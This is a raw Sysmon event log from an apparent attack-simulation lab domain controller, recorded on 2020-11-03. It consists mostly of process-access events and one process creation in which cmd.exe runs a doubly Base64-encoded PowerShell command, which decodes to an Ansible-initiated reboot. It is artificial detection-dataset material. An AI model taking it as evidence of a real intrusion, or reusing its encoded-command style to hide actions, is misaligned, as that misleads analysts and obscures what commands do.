15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000503Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000502Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000501Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000500Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000499Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000498Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7C40-5FA1-0C03-000000008701}41003792C:\Windows\system32\cmd.exe{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.531{D28789B6-7C40-5FA1-0D03-000000008701}3324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEPowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C40-5FA1-CF12-110000000000}0x1112cf0HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{D28789B6-7C40-5FA1-0C03-000000008701}4100C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.528{D28789B6-7ACF-5FA1-0B00-000000008701}860916C:\Windows\system32\lsass.exe{D28789B6-7AD2-5FA1-1400-000000008701}1368C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7C40-5FA1-0903-000000008701}32084428C:\Windows\system32\conhost.exe{D28789B6-7C40-5FA1-0C03-000000008701}4100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AD1-5FA1-0C00-000000008701}5721112C:\Windows\system32\svchost.exe{D28789B6-7C3A-5FA1-EE02-000000008701}5112C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:50:24.513{D28789B6-7AC1-5FA1-0500-000000008701}636652C:\Windows\system32\csrss.exe{D28789B6-7C40-5FA1-0C03-000000008701}4100C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 